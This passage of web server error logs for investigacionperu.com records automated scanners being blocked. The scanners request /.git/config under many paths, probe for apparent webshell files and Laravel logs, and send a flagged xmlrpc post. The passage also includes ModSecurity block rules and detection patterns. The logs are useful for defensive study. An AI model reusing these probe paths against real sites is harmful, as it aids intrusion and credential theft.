Jan 22 00:54:56.216151 2025] [autoindex:error] [pid 19899:tid 139991892055808] [client 150.136.69.140:46120] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 22 00:55:00.662143 2025] [:error] [pid 19286:tid 139991850092288] [client 150.136.69.140:46136] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jan 22 00:55:00.679260 2025] [:error] [pid 19284:tid 139991858484992] [client 150.136.69.140:46138] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jan 22 00:55:44.329876 2025] [:error] [pid 19286:tid 139991959197440] [client 150.136.69.140:46252] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jan 22 00:55:56.019705 2025] [:error] [pid 19284:tid 139991808128768] [client 150.136.69.140:46290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 22 00:55:56.029518 2025] [:error] [pid 19286:tid 139991917233920] [client 150.136.69.140:46292] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 22 00:56:30.090970 2025] [autoindex:error] [pid 19286:tid 139991934019328] [client 150.136.69.140:46388] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 22 00:56:37.624844 2025] [:error] [pid 19899:tid 139991967590144] [client 150.136.69.140:46410] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 22 00:56:38.462248 2025] [autoindex:error] [pid 19899:tid 139991858484992] [client 150.136.69.140:46414] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 22 00:56:39.283231 2025] [autoindex:error] [pid 19284:tid 139991808128768] [client 150.136.69.140:46418] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 22 00:56:44.279544 2025] [:error] [pid 19284:tid 139991824914176] [client 150.136.69.140:46432] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jan 22 00:56:44.291686 2025] [:error] [pid 19286:tid 139991833306880] [client 150.136.69.140:46434] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2025/01/22 02:37:19 [error] 19248#19248: *493292 access forbidden by rule, client: 52.63.44.47, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/22 02:38:23 [error] 19248#19248: *493293 access forbidden by rule, client: 13.201.16.232, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/22 04:10:11 [error] 8825#8825: *493806 access forbidden by rule, client: 13.201.16.232, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/22 09:07:07 [error] 17066#17066: *541 access forbidden by rule, client: 52.63.44.47, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/22 13:09:52 [error] 17066#17066: *2144 access forbidden by rule, client: 13.201.16.232, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/22 15:46:47 [error] 17065#17065: *4079 access forbidden by rule, client: 87.228.151.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/22 15:46:48 [error] 17066#17066: *4080 access forbidden by rule, client: 87.228.151.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/22 15:46:51 [error] 17065#17065: *4081 access forbidden by rule, client: 87.228.151.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/22 15:46:52 [error] 17065#17065: *4083 access forbidden by rule, client: 87.228.151.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jan 22 16:40:35.739700 2025] [autoindex:error] [pid 16964:tid 140140798232320] [client 212.30.36.14:59354] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/01/23 09:58:00 [error] 32682#32682: *14664 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/23 11:04:41 [error] 32682#32682: *16090 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 23 12:05:54.183498 2025] [:error] [pid 928:tid 140244481394432] [client 84.17.60.236:50996] [client 84.17.60.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z5J28szxK8JBl0uPUBnxmwAAANc"] 2025/01/23 12:49:32 [error] 32682#32682: *17243 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Jan 23 12:54:39.460476 2025] [:error] [pid 362:tid 140244489787136] [client 103.154.176.231:52860] [client 103.154.176.231] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z5KCX9maKbnUJTmjMM_aDwAAAJY"] [Thu Jan 23 12:54:40.621671 2025] [:error] [pid 928:tid 140244540143360] [client 103.154.176.231:52862] [client 103.154.176.231] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/core/storage/logs/laravel.log"] [unique_id "Z5KCYMzxK8JBl0uPUBnyowAAANA"] 2025/01/23 15:30:05 [error] 32683#32683: *19020 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Jan 23 17:30:38.757333 2025] [:error] [pid 362:tid 140244514965248] [client 168.182.206.57:57824] [client 168.182.206.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5LDDtmaKbnUJTmjMM_bNAAAAJM"] 2025/01/23 17:52:24 [error] 32683#32683: *20712 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 00:45:59 [error] 32682#32682: *25042 access forbidden by rule, client: 139.59.143.102, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/24 00:45:59 [error] 32683#32683: *25043 access forbidden by rule, client: 167.99.210.137, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/24 00:46:02 [error] 32682#32682: *25161 access forbidden by rule, client: 157.245.36.108, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/24 00:46:02 [error] 32682#32682: *25178 access forbidden by rule, client: 139.59.143.102, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/24 00:46:03 [error] 32682#32682: *25192 access forbidden by rule, client: 138.197.191.87, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Fri Jan 24 00:46:11.537775 2025] [authz_core:error] [pid 928:tid 140244615677696] [client 178.128.207.138:36162] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Jan 24 00:46:11.824219 2025] [authz_core:error] [pid 928:tid 140244624070400] [client 157.230.19.140:36166] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/24 00:46:15 [error] 32682#32682: *25271 access forbidden by rule, client: 178.128.207.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/24 00:46:16 [error] 32682#32682: *25273 access forbidden by rule, client: 157.230.19.140, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 02:19:10 [error] 32682#32682: *28609 access forbidden by rule, client: 3.108.243.190, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/24 02:19:10 [error] 32683#32683: *28611 access forbidden by rule, client: 3.108.243.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/24 02:19:10 [error] 32682#32682: *28610 access forbidden by rule, client: 3.108.243.190, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/24 02:19:10 [error] 32682#32682: *28612 access forbidden by rule, client: 3.108.243.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 02:19:10 [error] 32682#32682: *28614 access forbidden by rule, client: 3.108.243.190, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Fri Jan 24 02:26:22.902126 2025] [autoindex:error] [pid 928:tid 140244640855808] [client 64.227.143.182:41944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 24 04:25:38.743462 2025] [autoindex:error] [pid 22381:tid 140218980058880] [client 213.136.78.38:45170] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 24 04:38:10.370766 2025] [authz_core:error] [pid 22380:tid 140218904524544] [client 143.244.168.161:45330] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/24 04:38:13 [error] 22344#22344: *30913 access forbidden by rule, client: 143.244.168.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33216 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /application/modules/api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33217 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33219 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/smtp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33220 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /application/core/services/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33221 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33218 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33222 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /app/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33223 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /application/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33224 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/v4/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33226 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/cloud/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33225 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33228 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/admin/v4/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33227 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/aws/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33229 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/aws/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33230 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /alpha/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33231 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/user/v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33235 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /app/email/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33232 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/user/v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33233 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33234 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /app/services/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33236 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /app/notification/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33238 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33237 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33239 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /aomanalyzer/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33240 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/v2/services/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33242 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /a/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33241 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/email/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33243 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /amphtml/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33244 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/user/v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33245 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/user/v4/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33246 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /app/services/smtp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33247 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/internal/services/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33248 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/notification/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33249 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33250 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/v1/services/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33251 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /__MACOSX/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33252 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/admin/v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33253 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/admin/v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33254 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33255 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/email/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33256 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /api/admin/v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33257 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33258 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /build/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33260 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-content/plugins/custom-plugin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33261 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /shared/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33259 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /shop/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33265 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /common/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33266 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/mail-service/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33267 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /old-cuburn/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33268 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33269 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/notifications/push/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33262 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-includes/js/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33275 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33263 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33276 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33277 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /mailer/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33264 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33278 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33271 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/services/mailer/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33270 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /src/email/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33272 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /core/email/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33273 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /beta/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33279 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /connectors/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33274 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /workers/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33280 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /includes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33300 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /qa/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33281 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-content/mu-plugins/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33282 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/email/mailjet/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33303 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /flock/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33302 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-includes/js/.git/config/admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33301 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /blog/wp-content/themes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33283 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /samples/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33284 access forbidden by 